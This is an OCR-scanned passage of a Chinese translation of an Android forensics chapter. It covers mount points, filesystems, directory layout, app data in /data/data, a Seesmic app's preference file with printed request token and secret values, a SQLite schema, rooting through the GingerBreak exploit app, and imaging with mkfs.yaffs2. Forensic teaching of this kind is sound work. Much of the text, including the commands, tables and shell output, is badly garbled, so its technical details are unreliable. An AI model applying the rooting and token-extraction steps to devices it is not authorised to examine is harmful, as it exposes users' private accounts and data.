本 音 将 通过 分 析 Android 设备 上 的 各 种 挂 载 点 ， 介 绍 Android 的 文件 系统 ， 以 
及 它 的 目录 结构 ， 这 将 有 助 于 读者 了 解 并 掌握 Android 文件 系统 相关 的 有 用 信息 。 


原 书 注 





四 ”移动 设备 取证 ， 和 参考 维基 百科 hup: //en. wikipedia. org/ wiki/ Mobile_device_forensics。 
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典型 Android 设备 的 挂 载 点 如 图 8. 1 所 示 。 


oab she! 


relatiume uU g 
clórime,mode»755 0 € 


vots rw relotime, S SP, WH 


, occt 6 d 
ISI. PL dé GU-1O00 U 9 
elotime,modes755,gi.d«19000 0 8 
N r elotimt, copo o p 
cache yafftss re nosvud nodey roelorinme ò d 


s yaffs? ra,nosuid,nodev, relicrtims @ 0 


sdhci.,.08/5y-name/sysrem /syscem exr4 ro,relotime,barriers], 


c-sdhci.U/5y-name/userdata /dato exré rw.nosuld,nodev , noa 
ys/kernel/deouq debuafs rw,rceigtime 0 0 
) Jent sdcard vfat rw,dirsync,nosutd,nodev ,noexec, relatime. 


asec Vior rw,dirsync,nosuld,^odev , noexec, relc 


"elarime,ss2ec-dk,mode- $Y 





[8.1 Android 设备 上 的 挂 载 点 


8.2.1 ERA 


首先 来 看 一 下 Android 设备 上 的 各 种 分 区 ， 以 及 与 其 相关 的 文件 目录 结构 ， 如 
图 8. 2 所 示 ， 输 入 并 执行 “adb shell mount". 命令， 显示 设备 上 已 挂 载 的 文件 系统 。 
然后 ， 上 再 输入 并 执行 “adb shell cat/proc/filesystems" 命令 ， 显 示 系 统 支持 的 文件 系 
统 类 型 列表 ， 如 图 8.3 所 示 。 表 8.1 给 出 了 Android 设备 上 的 各 种 分 区 信息 及 其 说 明 . 
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”该 目录 结构 是 使 用 adb 工具 查看 与 用 户 工作 电脑 相连 接 的 Android 设备 的 文件 系统 目录 结构 。 一 一 译 者 注 
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图 8.2 Android A ff] c f/F El se Sg 
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/system 


/cache 


/data 


/ mnt/ sdcard 


/ mnt/ secure/ asec 


binfmt misc 
debugfs 


SOCk fs 
pipefs 





图 8.3 Android 设备 文件 系统 类 型 


表 8.1 Android 设备 已 挂 载 的 文件 系统 简介 
说 明 

只 读 模 式 的 根 文件 系统 ， 由 内 核 在 其 他 文件 系统 挂 载 之 前 挂 载 ， 包 含 重 要 的 系统 
信息 ， 如 内 核 启 动 时 所 需 的 引导 配置 和 各 种 支持 库 等 

包含 系统 支持 库 、 可 执行 文件 、 字 体 、 系 统 应 用 程序 ， 以 及 各 种 配置 文件 等 ， 该 
目录 在 文件 系统 上 的 权限 为 只 读 ， 在 该 目录 中 的 于 文件 夹 有 ban, lib, etc, bin, 
app、media 和 fonts 等 

包含 各 种 临时 文件 ， 例 如 浏览 器 缓存 和 下 载 的 文件 ， 以 及 系统 崩溃 后 执行 系统 修 
复 产 生 的 各 种 恢复 文件 等 。 在 文件 系统 中 ， 该 文件 夹 对 外 提供 可 读 写 权限 

包含 用 户 数据 和 应 用 程序 数据 ， 其 中 包括 用 户 安装 的 应 用 程序 、 程 序 设 置 和 配置 
参数 文件 (shared preference) 等 

该 分 区 指向 SD 卡 ， 其 文件 系统 类 型 为 FAT32， 且 具有 可 读 写 权限 

位 于 SD 卡 内 ， 供 安装 在 SD 卡 上 的 应 用 程序 存储 经 过 加 密 处 理 的 文件 


8.2.2 文件 系统 


Android 操作 系统 基于 Linux 内 核 ， 因 此 可 以 支持 很 多 的 文件 系统 。 使 用 adb 
工具 在 相连 的 设备 上 开启 的 shell 程序 中 ， 以 命令 行 的 方式 输入 并 执行 “cat/ proc/ 
filesystems ”命令 ， 可 以 获得 Android 系统 支持 的 文件 系统 列表 。 如 图 8.3 所 示 ， 文 
件 系 统 旁 边 的 nodev 表示 没有 实际 的 物理 设备 与 该 文件 系统 关联 ， 因 此 系统 使 用 
nodev 作为 虚拟 的 文件 系统 。 需 要 注意 的 是 ，Android 系统 支持 ext2, ext3 和 ext4 X 
件 系统 ， 这 些 文件 系统 通常 用 在 Linux 操作 系统 。 同 时 ，Android 系统 还 支持 vfat 文 
件 系 统 ， 该 文件 系统 通常 被 用 在 基于 Windows 的 操作 系统 上 。 此 外 ， 由 于 Android 
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系统 是 针对 移动 设备 设计 的 ， 因 此 ，Android 系统 还 支持 YAFFS2 和 YAFFS2 文件 
系统 ( 当然 ， 要 想 支持 YAFFS 和 YAFFS2 文件 系统 ，Android 设备 还 需要 具有 支持 
NAND 的 芯片 才 可 以 )。 上 述 文 件 系统 的 详细 信息 见 表 8. 2。 
表 8.2 Android 系统 的 各 种 文件 系统 
文件 系统 说 明 


许多 移动 设备 都 会 使 用 YAFFS fü YAFFS2 文件 系统 ， 它 们 是 专门 针对 NAND 或 
NOR 闪存 而 设计 的 快速 且 强 大 的 文件 系统 ， 专 用 于 散人 式 设 备 。 其 中 ，YAFTS2 是 较 
YAFFS 和 YAFFS2 | 新 的 文件 系统 版 本 ，YAFFS1 支持 以 512B 作为 每 个 page 大 小 的 闪存 ， 而 YAFFS2 则 
可 以 支持 以 2KB 作为 每 个 page 大 小 的 闪存 。 也 就 是 说 ，YAFFS2 可 以 支持 大 容量 的 
内存。 更 多 有 关 这 两 种 文件 系统 的 信息 请 参考 http: //www. yaffs. net/ 


通常 Linux 内 核 使 用 这 些 文件 系统 ， 即 exi2, ext3 和 ext4 (第 二 代 、 第 三 代 和 第 四 
代 扩 展 文 件 系 统 ) 。ex 文件 系统 是 20 世纪 90 年 代 早 期 推出 的 ， 用 于 解决 Linux 内 
核 使 用 的 ext 文件 系统 中 存在 的 一 些 问题 。exB3 文件 系统 在 ext 文件 系统 中 增添 了 日 
志 功 能 ， 以 及 一 些 其 他 的 新 特性 。ext4 文件 系统 在 ext3 文件 系统 中 进一步 添加 了 新 
的 功能 ， 包 括 对 超大 文件 系统 和 超大 文件 的 支持 ， 引 入 extent 的 文件 存储 方式 (取代 
了 ext2 ext3 中 使 用 的 block mapping 文件 存储 方式 ) ， 以 及 一 些 其 他 的 功能 


vfat 也 就 是 微软 公司 开发 的 FAT32 文件 系统 。 在 Linux 内 核 中 ，FAT32 文件 系统 的 
实现 即 称 为 vfat 文件 系统 。 该 文件 系统 主要 用 在 Android 系统 的 SD 卡 上 


ext2 ext3 和 ext4 


vfat 


8. 2.3 目录 结构 


首先 来 看 一 下 典型 Android 设备 的 目录 结构 。 读 者 可 以 通过 adb 工具 在 相连 设 
备 上 启动 的 shell 程序 ， 以 命令 行 的 方式 访问 Android 设备 的 文件 系统 ， 也 可 以 通过 
Eclipse 软件 的 DDMS 工具 (如 图 8.4 所 示 ) 访问 Android 设备 的 文件 系统 。 在 这 里 
需要 注意 的 主要 是 三 个 目录 ， 即 /system、Vsdcard 和 /data。 前 面 介绍 过 ，/system H 
录用 于 存放 和 操作 系统 相关 的 大 部 分 文件 , 包括 系统 应 用 程序 、 支 持 库 、 字 体 文 
件 、 可 执行 文件 ， 等 等 。/sdcard 目录 是 一 个 映射 到 /mnt/sdcard 目录 的 软 链接 ， 指 
向 设备 上 的 SD E, /data 目录 用 于 存放 用 户 数 据 。 具 体 来 说 ， 每 一 个 应 用 程序 都 
有 一 个 “/data/app/ < 应 用 程序 名 称 > ”目录 与 之 关联 ， 应 用 程序 用 户 数据 存放 在 
与 其 关联 的 “/data/data/ < 应 用 程序 名 称 > ”目录 中 。 对 于 移动 设备 来 说 ， 用 户 无 
法 访问 /data 目录 ， 因 为 该 目录 只 对 Android 系统 用 户 可 读 ， 而 用 户 作 为 shell Fl P 
(用 户 通过 adb 工具 在 相连 接 设备 上 启动 的 shell 程序 ， 只 能 赋予 用 户 shell 用 户 的 


© YAFFS ( Yet Another Flash File System) 是 一 个 专门 为 NAND Flash 存储 器 设计 的 媒人 和信 式 文件 系统 ，、 适 
用 于 大 容量 的 存储 设备 ， 并 且 是 在 GPL (General Public License) 协议 下 发 布 的 ， 可 在 其 网 站 免费 获 
得 源 代码 ， 在 YAFFS 中 ， 最 小 存储 单位 为 一 个 Page， 文 件 内 的 数据 是 存储 在 固定 512B 的 Page 
中 一 一 译 者 注 
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文件 系统 访问 权限 ) 没有 对 该 目录 的 访问 权限 。 本 章 通 过 模拟 器 来 展示 /data 目录 
的 内 容 。 由 于 应 用 程序 将 用 户 数据 存放 在 与 其 关联 的 “/data/data4 < 应 用 程序 名 
称 >” 目 录 下 ， 所 以 保证 只 有 该 应 用 程序 才能 访问 与 其 关联 的 特定 文件 目录 ， 对 
于 确保 应 用 程序 信息 数据 安全 是 非常 重要 的 。 这 种 访问 控制 机 制 主要 通过 用 户 权 限 
来 实现 ， 也 就 是 说 每 个 应 用 程序 都 有 自己 的 UID， 并 且 只 有 具有 该 UD 或 只 有 该 用 
户 才 有 权限 访问 与 其 相关 联 的 文件 目录 。 表 8. 3 给 出 了 Android 系统 上 应 用 程序 可 
能 需要 访问 的 几 个 重要 的 文件 /目录 的 人 简介。 本 章 将 在 后 面 介绍 /data/data 文件 来 
的 结构 。 








[ges ns E98 0, $3 3/2[8 B7220 Te B Anecation Tracker | Network S 


Permissions 
~ 2012-04-07 2030 drwxrwx—x 
2012-09-04 18:14 drwxrwxr-x 
2012-09-04 18:14 drwxr-xr-x 
2012-09-04 18:14 drwxr-xr-x 
1969-12-31 16:00 d---rwxr-x 
2012-09-04 18:14 drwx------ 
1969-12-31 16:00 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17? 09:32 drwxr-xr-x 
1984 2010-12-17 09:32 -tw-r--r-- 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17? 09:32 drwxr-xr-x 
2010-12-17? 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 
2010-12-17 09:32 drwxr-xr-x 





图 8.4 Android 设备 目录 结构 (通过 Eclipse 上 的 DDMS 工具 查看 ) 
表 8.3 Android 系统 上 重要 的 文件 /目录 


目录 /文件 说 BH 
/cache 存放 临时 信息 ， 如 浏览 器 缓存 、 功 能 设置 或 恢复 的 文件 等 
/sdcard 用 于 应 用 程序 存放 数据 ， 如 音乐 文件 、 下 载 的 文件 、 照 片 等 
/vendor 专用 于 设备 制造 厂商 (如 三 星 、HTC 等 ) 存放 文件 的 目录 
m Android 系统 目录 ， 包 含 各 种 系统 配置 文件 、 三 进 制 程序 文件 、 系 统 
应 用 程序 ， 等 等 
/ system/etc/ permissions/platform. xml | ”将 底层 用 户 ID/ 群 组 ID 的 权限 同系 统 使 用 的 权限 名 称 进 行 映 射 
/ system/app 预 装 在 设备 上 的 系统 应 用 程序 
/ system/ bin 二 进 制 的 可 执行 文件 ， 例 如 ls, mount 等 
/ system/ buid. prop 设备 特有 的 具体 配置 和 信息 
/ data/ data 用 于 已 安装 的 应 用 程序 存放 用 户 数据 
/ data/app 用 户 安装 的 应 用 程序 
/ data/app- private 用 户 安装 的 应 用 程序 (通常 是 一 些 付 费 的 应 用 程序 ) 


/mnt/asec 用 于 存储 安装 在 SD 卡 上 的 应 应 用 程序 的 相关 文件 
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8.3 Android 应 用 程序 数据 


本 市 将 介绍 应 用 程序 保存 持久 化 数据 的 方法 ， 查 看 /data/ data 文件 夹 的 内 容 ， 
以 及 如 何 从 该 目录 内 获取 有 用 信息 。 


8.3.1 存储 方式 


Android 系统 提供 多 种 存储 方式 供应 用 程序 根据 自身 需求 保存 持久 化 数据 . 
dx 8.4 提供 了 各 种 可 供 选 择 的 数据 存储 方式 。 


表 8.4 Android 应 用 程序 存储 方式 简介 
存储 方式 说 HH 


将 私有 数据 以 键 值 对 的 形式 存储 ， 主 要 用 于 存储 原型 数据 ， 如 boolean, float, int, 


N 2 
Mida: 以 及 string 等 类 型 的 数据 


在 内 部 存储 器 上 存储 私有 数据 ， 应 用 程序 能 直接 将 文件 存储 在 内 部 存储 器 上 (与 
内 部 存储 器 相对 的 是 外 部 存储 器 ， 如 SD 卡 等 ) ， 存 储 的 文件 受到 文件 权限 的 保护 . 
应 用 程序 是 其 创建 的 文件 的 所 有 者 。 需 要 注意 的 是 ， 如 果 应 用 程序 要 想 使 其 创建 的 


Dionem 文件 只 对 它 自己 开放 操作 权限 ， 则 应 当 使 用 MODE_PRIVATE 选项 创建 文件 。 否 则 ， 
如 果 使 用 MODE WORLD. READABLE 或 MODE_WORLD_WRITABLE 选项 创建 文件 ， 
将 对 其 他 所 有 的 应 用 程序 开放 读 写 操作 权限 

外 部 存储 将 数据 存储 在 共享 的 外 部 存储 设备 上 。 在 外 部 存储 设备 上 存储 的 文件 对 所 有 的 应 


用 程序 开放 该 写 操作 权限 ， 并 且 文件 数据 不 受 基于 权限 的 安全 访问 机 制 保护 
SQLite 数据 库 将 数据 存储 在 私有 数据 库 中 ， 数 据 存 取 的 权限 只 对 该 数据 所 属 的 应 用 程序 开放 
网 络 连接 将 数据 存储 在 网 络 服务 器 上 


8.3.2 /data /data 


前 面 已 经 介绍 了 应 用 程序 可 选 的 数据 存储 方式 ， 接 下 来 通过 一 些 真实 的 应 用 程 
序 ， 分 析 它 们 的 /data/data/ 目 录 。 安 装 Seesmic 应 用 程序 ， 该 应 用 程序 可 以 使 用 户 
能 够 管理 并 登录 多 个 社交 网 站 账号 。 图 8.5 展示 的 是 /data/data 目录 下 的 子 目 
录 /data/ data/com. seesmic ， 也 就 是 Seesmic 应 用 程序 关联 的 目录 。 该 应 用 程序 的 目 
SK F&& TF =Ni.: databases, lib 和 shared_prefs。 普 通用 户 或 shell 用 户 无 法 
访问 设备 上 的 /data/data 目录 ， 因 为 该 目录 的 访问 权限 只 对 系统 拥有 者 (也 就 是 系 
统 用 户 system) 开放 。 读 者 可 对 移动 设备 进行 root 处 理 ， 然 后 再 访问 该 目录 。 也 可 
以 将 Android 文件 系统 制作 成 镜像 文件 ， 然 后 再 读 取 该 镜像 文件 中 /data/data 目录 
的 内 容 。 

从 这 个 文件 夹 的 结构 可 见 ， 应 用 程序 可 以 将 数据 存储 在 SQLite 数据 库 中 ， 也 
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# cd /data/data/com. se* 
# pnd 

/data/data/com. seesmic 
& is -l 


drwxrwx--x app.40 — app.48 2012-09-05 06:24 databases 
drwxrwx--x app 40  Japp. 40 2012-09-05 06:24 shared prefs 
drwxr-xr-x system system 2012-09-05 06:21 lib 

# | 





[| 8.5 /data/data 目录 内 Seesmic 应 用 程序 的 目录 


可 存储 在 共享 配置 文件 (Hl shared preference XML 文件 ) 中 。 接 下 来 研究 一 下 这 些 
- 看 看 是 否 能 够 获得 更 多 有 用 的 信息 。 浏 览 shared_prefs 目录 内 容 ， 使 用 
" 命令 查看 其 中 任 一 XML 文件 的 内 容 ， 从 中 可 以 得 到 应 用 程序 中 使 用 的 一 些 
Na EB, (这 些 信息 以 键 值 对 的 形式 体现 在 XML 文件 中 ) MEI 8.6 可 见 ， 在 该 XML 
文件 内 部 定义 的 各 种 键 值 对 中 ， 有 一 个 名 为 “req_token_secret” 的 键 什 对， 还 有 一 
个 名 为 “req_token” 的 键 值 对 。 如 果 应 用 程序 的 开发 者 不 够 细心 ， 就 可 能 在 这 里 
存储 各 种 敏感 信息 (甚至 包括 明文 形式 的 密码 ) 。 


# cd shared prefs* 

At 3S 

-l'W-rw---- app.40 app 40 1201 2012-09-05 06:24 com.seesmic preferences .xml 
-rw-rw---- app.40  app.49 126 2012-09-05 06:24 | has set defoult values.xml 
HW cat ,has* 

?xml versione'1,0' encoding-'utf-B' stondalone-'yes' ?> 

q(mop» 

«boolean namee«" has set defoult values" value="true" /> 

/map» 

# cat com.see* 

<?xml versione'1.0' encodinge'utf-8' stondalone='yes' ?> 

«map» 

«string namee"refresh time"»1800-/string» 

«boolean name»"show avatars" volue=" true" /> 

«string Namew req token" »SzUuExuSHEVGKCYXMYL72hHxyPJbKeQcOmQqzBTIKKS«/ string» 
«string name=" font. size"»14«/string» 

«boolean names"first run" value="false" /> 

«boolean names"hd avatars" value="true" /> 

«string name»"clear on install"»v5«/string» 

boolean name»"bkg updates" value="true" /> 

boolean namee"replies notif" value="true" /> 

«string name»"photo"»http://twitter.com/«/string» 

«string nome»"view user" »profile«/string» 

String names"nb tweets"»50«/string» 
«string name«"shorturl"»http://api .bit.ly/«/stríng» 

boolean names"remember pos" value="true" /> 

boolean names"autoscroll. messages" value="true" /> 

"String nome-"reg token secret "»Tqv3wAxuINwNhwzOgluVpE 12W3HvKQuF AVWSGy4 jt. J4«/ string» 
string name»"photo quality" »1024«/string» 

booleon name»"led key" volue»"true" /> 

String name»e"quote. style »RT«/string» 

boolean names"vibrote" value="true" /> 

boolean name=" dm notif" value="true" /> 
«boolean name=" preview pics" value="true" /> 

dboolean name=" bkg notifications" value="true" /> 
«string name«"video"»http:;//yfrog.conm/ «/string» 

mop» 
"| 





图 8.6 shared  prefs 文件 夹 内 任 一 XML 文件 的 内 容 


从 图 8. 5 中 还 可 以 看 到 ， 在 /data/data/com. seesmic H 录 内 还 包含 一 个 数据 库 
文件 夹 。 打 开 该 文件 夹 可 以 看 到 一 个 名 为 twitter. db 的 数据 库 文件 ， 说 明 设备 用 户 
拥有 一 个 twitter 账号 。 接 下 来 再 来 看 一 下 是 否 能 够 从 twitter. db 数据 库 文件 中 ， 

到 更 多 的 关于 该 twitter 账号 的 信息 。 可 以 使 用 SQLite3 命令 行 工具 来 进行 这 项 工 
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作 。 该 数据 库 文件 内 容 如 图 8. 7 Bras, 从 中 可 以 了 解 到 该 数据 库 的 结构 。 然 后 ， 就 
可 以 通过 查询 数据 库 中 的 数据 表 ， 获 取信 息 。 


# ped 
[rriv PEr vis dnr NES Rus rint rire 
E is 
-ewf o NE app. 49 o24604 r912-U09-45 06:24 tnirtter.db 
9 sqlite3 twitter. db 
5OLite version 3.6.22 
Enter" ".help" for instructions 
Enter SQL staütements terminated witn à "; 
Slite» .scnema 
CREATE TABLE accounts (Cig TEXT S ECL TEXT possmworgd TEXT ,fullogse TE ovator url TEXT main INTEGER, odded index INTEGER, rešt api TENT, 
5 INTEGER. mentions y INTEGER, token INTEGER, Secret INTEGER, type INTEGER, UNINE C td, rest. api})); 
CREATE TABLE androta merodoro (locaie TEXT); 
CREATE TABLE ortochs (.ið INTEGER PRIMARY KEY rone TEXT porn TEXT size INTEGER sedig id INTEGER, UL TEXT type INTEGER }; 
CREATE TABLE authors (ig INTEGER PRIMARY KEY,„Screen nase TEXT, full nome TEXT avatar url TEXT protected INTEGERYJ,; 
CREATE TABLE dm (id INTEGER PRIMARY KEY my anr id INTEGER occount ta INTEGER, Sexer id INTEGER, recipient id INTEGER messoge TEXT uris FEXT, Sn s56 
CREATE TAME facebook outhors (td TEXT PRIMARY KEY, full. name TEXT awatar- uri TEXT cotegory TEXT}; 
CREATE TARLE facebook feeds (id INTEGER PRIMARY KEY OCcCoont_id TEXT upóate ig TEXT feed. type INTEGER owner id TENT, UNIQUE Coccoont id, upacte id 
CREATE TABLE Facebook friendlists MIN S id KET account ia TEXT, name TEKI checked INTEGER, type INTEGER, UNIQUE (id, ocœount +G 月 
CREATE TABLE facebook page. profiles (gd INTEGER PAIMARY KEY user ia TEXT occount id TEXT, website TEXT ,foonded TEXT comporry ovèerviem TEXT mission 
tegory TEXT, subcategory TEXT „description TEXT starring TEXT directed by TEXT plor -outilipe TEXT, release coore TEXT genre TEXT, studio TEXT, b10 TEXT: 
nterests TEXT, likes INTEGER, UNIQUE (user. ig, Ee LR CPEM 

CREATE TABLE focenook people C id INTEGER PRIMARY KEY account id TEXT,user id TEXT, relationship type INTEGER omer Lo TEXT soved INTEGER, UNIQUE C 
CREATE TABLE focevook profiles (td INTEGER PRINARY KEY oser id TEXT acount ig TEXT about TEXF birthday TEXT, Pork FEKT educotion TEXT, emaii TENT 
r (EXT, political TENTI activities TEXI,music TEXT, DOORS TEXT movies TEXT tost updated INTEGER, UNIQUE (user id, account. id)); 
CRÉATE TABLE focevook updotas (_ id INTEGER PRIMARY KEY, my upiate id TEXT account id TEXT, from id TEXT, to user TEXT messoge TEXT, likes count INTE 
Linkur TEXT, link nane TEXT, link captiótt TEXT, itihk description TEXT, source uri TEXT Vid TEXT, ,creored oore INTEGER, typa INTEGER privacy TEXT, ONIN 
CREATE TABLE list info C id INTEGER PRIMARY KEY info list <d INTEGER info status id INTEGER, UNIQUE Cinfo list id, info stetus.id)); 
CREATE TABLI sts (td INTEGER PRIMARY KEY OCCOount ia INTEGER, list tg INTEGER, List full name TEXT, List description TEXT, creotor_id INTEGER, lisi 
COunt INTEGER member count. INTEGER, is followed INTEGER, UNIQUE Coceoonr td; list 1d, iist type, oener 10)); 
CREATE TABLE muite (ig INTEGER PRIMARY KEY 71083531 TENT mute Descripeton TEXT mute pic url TEXT 113952 INTIEGER , MUIQUE Caute.title ER. 
CREATE TARLE search results Cid INTEGER PRIMARY KEY my tetet id INTEGER i urt TEXT, crestei tise INTEGER, from user TEXF, text TEXT urls 了 EX 
NTEGER, from user id INTEGER, cener ouery MUS SPEC I: Cery tweet id. oner ou PP 
CREATE TAELE Seorches (id INTEGER PRIMARY KEY T oU INTEGER naie TEXNI 7:2 TEXT, CeOUeC tise INTEGER); 
CREATE 了 ABLE timelines (id INTEGER PRIMARY KEY occount id INTEGER, Smet id INTEGER timeline INTEGER Owner_ id INTEGER, UNIQUE (account id, tetero 
CREATE TABLE topics (.1d INTEGER. PRIMARY KEY,nome TEXT,quecy TEXTY; 
CREATE TABLE tweets (10 INTEGER PRIMARY KEY M. id INTEGER occount. 1d INTEGER, sender id INTEGER, wessooe TEXI ,SOwrce TEXT, tin reply. to stoti 
iq uu INTEGER, Latitude REAL, longitude REAL retweeted by ta INTEGER Totarered by screen nome TOT, remest.coount INTEGER Ortginal id INTEGER, 
"my tweet _id)); 
CREATE TAULE useriists Cid INTEGER PRINARY MAFEY occount ts INTEGER user to INTEGER Friendsnig INTEGER, Coner_ dd INTEGER, userlist soved INTEGER, | 
CREATE TABLE users ( ind INTEGER PRIMARY KET,my user id INTEGEN,GCCDuht 1d INTEGEK, Oweeth count INTEGER, favorttes, count INTEGER, Friends Count I f 
L TEXT profi le location TEXT profile description TEXT, is frier INTEGER, is follower INTEGER, is blocked iNTEGER verified INTEGER, UNIQUE (accounta 
CREATE INDEX Qutnor.i(idX* UN gQurnors (C.10); 
CREATE INDEX dm igx ON œn (my RTT 
CREATE INDEX frienóship tax ON usertists Cfriendsnip); 
CREATE INOEX iist.i1dx ON List info (CUNTO list ido; 
CREATE INDEX timeline. idx ON Tiestines (triseiine),; 
CREATE INDEX tweet. id idx ON seorch results (my. Cweet 10); 

INDEX Cwmeet idx ON tweets (my teet. 13); 

INUCX type igx UN lists (iist Cyp?); 

INDEX user idx ON users (my.user id); 

select * fros facebook frleñditsts, 

select * from occounts' 





8.7 SQLite 数据 库 文 件 内 容 


8.4 Android 设备 的 root 处 理 


默认 情况 下 ，Android 设备 只 给 用 户 提供 有 限 的 操作 权限 。 这 些 精心 设计 的 权 
限 约 束 用 于 阻止 恶意 软件 (以 及 用 户 ) A Android 安全 模型 提供 的 安全 控制 机 
制 。 有 时 ， 这 些 权 限 约 束 还 用 于 防止 特定 的 功能 被 访问 或 改变 。 例 如 ，Tethering” 





© Tethering， 指 通过 智能 手机 或 平板 电脑 等 移动 设备 ， 将 它 的 上 网 功能 分 享 给 其 他 设备 使 用 的 功能 ， 它 
利用 移动 设备 ， 如 手机 或 平板 电脑 ， 作 为 无 线路 由 着， 或 是 无 线 接 入 点 热点 。 其 他 设备 ， 如 笔记 本 
电脑 或 PDA， 可 以 通过 Wi-Fi 的 无 线 局 域 网 ， 或 是 蓝牙 等 无 线 传 输 ， 或 是 USB 之 类 的 实体 传输 线 ， 
来 与 手机 连接 。 之 后 再 利用 手机 的 2G 或 3G 调制 解 调 从 连接 ， 或 是 无 线 局 域 网 ， 连 接 到 互联 网 ， 达 
到 分 享 上 网 的 功能 。 许 多 智能 手机 ， 以 软件 的 方式 ， 来 提供 这 个 功能 。 一 一 译 者 注 
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或 代理 安装 功能 等 。 当 需要 分 析 一 个 设备 时 ， 往 往 需要 获取 该 Android 设备 的 root 
权限 。 通 过 adb 工具 登录 到 相连 设备 的 shel 控制 人 台 程 序 时 ， 登 录用 户 被 赋予 shell 
用 户 权限 ， 其 UD 即 为 “shell”，shell 用 户 实 际 上 无 法 访问 一 些 目录 ， 比 如 /data 
目录 ， 因 为 shell 用 户 没有 足够 的 权限 。 因 此 ， 需 要 将 用 户 的 权限 提升 为 超级 用 户 
权限 (也 就 是 root 权限 )， 而 实现 这 种 权限 提升 的 处 理 过 程 就 称 为 root。 一 般 情 况 
下 ， 成 功利 用 系统 存在 的 漏洞 可 以 使 用 户 转变 成 超级 用 户 。 用 户 可 以 从 网 络 上 下 载 
与 其 设备 版 本 匹配 的 Break. apk 文件 ， 对 设备 进行 root 处 理 。 接 下 来 ， 本 市 将 引导 
用 户 获 取 Froyo?2. 2 版 本 的 Android 操作 系统 的 root 权限 。 

1) 检测 Android 操作 系统 版 本 ， 按 照 “Settings- > About Phone” 顺 序 操作 ， 跳 
转 到 “About phone ”界面 查看 ， 如 图 8.8 所 示 ， 在 “About phone" "p b, 显示 
有 详细 的 Android 系统 版 本 和 内 核 版 本 信息 。 

2) 通过 adb shell 连接 Android 设备 ， 并 执行 “ID” 命 令 ， 此 时 用 户 为 “shell” 
用 户 身 份 (UID =2000 [shell]), 

3) 考虑 到 用 户 使 用 的 Android 操作 系统 为 Froyo2. 2. 2 版 本 、 Gingerbread 呈 版 本 
或 Honeycomb 号 版 本 ， 所 以 下 载 root 工具 软件 Gingerbreak. apk， 如 图 8.9 所 示 。 





superuser v3.1.3 (46) 
tap to display changelog 


elite not installed 
pet elite 


su bit: v3.1.1 rm 


T che eror obse 


ex outdated binary notification 


temp unroot 
i p 


Xá ; ota survival 


nate: these options are not guaranteed 
and wil! not work for all devices 





图 8.8 Android 版 本 图 8.9  Gingerbreak 应 用 程序 界面 


4) 激活 USB 调试 功能 。 
5) 执行 命令 “adb Install gingerbreak. apk”， 安 装 Gingerbreak 应 用 程序 。 
6) 启动 Gingerbreak 应 用 程序 ， 该 应 用 程序 将 自动 安装 超级 用 户 应 用 程序 。 


Android Froyo ( Android 冻 酸奶 ) Android 操作 系统 2.2 或 2.2.x 版 本 代号 。 一 一 译 者 注 
Android Gingerbread ( Android FOF) , 
Android Honeycomb ( Android && 4) , Android 操作 系统 3. x 版 本 代号 。 一 一 译 者 注 
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7) 现在 ， 使 用 adb 工具 通过 shell 程序 的 命令 行 方 式 连 接 设 备 并 执行 “su” 命 
A, "lE 8.10 所 示 。 之 后 ， 设 备 完 成 root 处 理 ， 用 户 能 够 浏览 各 种 权限 的 文件 夹 
了 ,例如 /data/data 目录 。 


| Bl CWmdows systerT2 em me - ade chel tc c 
n 


In ^c 
Ec: users \Bloegene>adb shell 


| IT Dap is gid- 2996(s shell) groups SN (gn Kilos 32s spins +2907 ( log), 100 
1011 (34b), 1915 sdr card rw), 3i 391 nÍn ,3802(n t 





id 

uid-e(root) gid ia ot) ups ZO REF as 2i 1004 ( 1nput), t og), 1009 (mount ), 
1011(adb),18015(5dcard rw A i Bus 3b62fnet bf)73B63tir 

u 


图 8.10 Android 设备 root 处 理 过 程 中 的 Shell 控制 台 显 示 变 化 


8.5 制作 Android 系统 镜像 


有 时 ， 将 Android 设备 制作 成 镜像 ， 并 利用 分 析 人 员工 作 机 上 的 各 种 工具 分 析 
制作 的 Android 镜像 ， 对 分 析 Android 设备 的 文件 系统 是 很 有 必要 且 十 分 有 用 的 ， 
尤其 是 在 需要 将 原始 的 文件 系统 保存 为 凭证 ， 或 是 在 以 后 还 要 用 到 原始 的 文件 系 
统 ， 而 不 能 直接 操作 原始 的 文件 系统 ， 但 又 需要 对 该 文件 系统 进行 分 析 调查 等 处 理 
时 。 对 于 这 种 情况 ， 分 析 人 员 不 可 能 直接 抛 开 原始 目标 设备 开展 分 析 等 工作 。 因 
此 ， 就 需要 将 原始 目标 设备 复制 成 镜像 文件 。 然 后 ， 使 用 生成 的 镜像 文件 进行 调 
查 / 分 析 操 作 。Android 设备 镜像 的 制作 过 程 如 下 : 

1) 使 用 下 面 的 命令 将 下 载 的 mkfs. yaffs2 复制 到 设备 中 的 SD RE., 


adb push mkfs. yaffs2/mnt/sdcard/ tmp 


2) 开启 adb shell, EH "su" 命令 将 用 户 身 份 转换 为 超级 用 户 (BI root 用 
户 )。 使 用 下 面 的 命令 将 /mnt/sdcard/tmp/ 目 录 下 的 mkfs. yaffs2 文件 的 权限 修改 
XI 1354 


chmod 755/mnt/ sdcard/tmp/mkfs. yaffs2 


3) 执行 下 面 的 命令 创建 Android 设备 镜像 。 此 时 ， 得 到 生成 的 data. img 镜像 
文件 ， 该 文件 即 为 Android 设备 的 系统 镜像 。 


/ mnt/sdcard/tmp/ mkfs. yaffs2 data. img 
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4) 使 用 命令 pull 通过 adb shell ——— 的 工作 机 上 。 
adb pull/ tls fan unp/ data. img ENTRATE COUPE 


délor. acti nm dubolooA n uS Ou 


现在 ， 该 设备 的 镜 并 像 已 经 存放 在 分 析 人 员 的 工作 机 上 了 ， 分 析 人 员 可 以 使 用 各 
种 相关 的 工具 ( 如 yaffey) 对 该 镜像 进行 分 析 。 使 用 yaffey 工具 分 析 Android 设备 
镜像 的 过 程 如 图 8.11 所 示 ， 该 分 析 工 具 可 从 网 站 http; //code. google. com/p/ 
yaffey/ 上 下 载 获得 。 


| Chee Sees impon Export Espandi Ad Coles A] — Rename Deste Propesriies 


wg ugs a 
pou 


Pa^ in 

Name xe Permissions Alias Date Modified User Group * | | 

sestan Utuxt ux tX 13/00/2012 213845 system. system | 
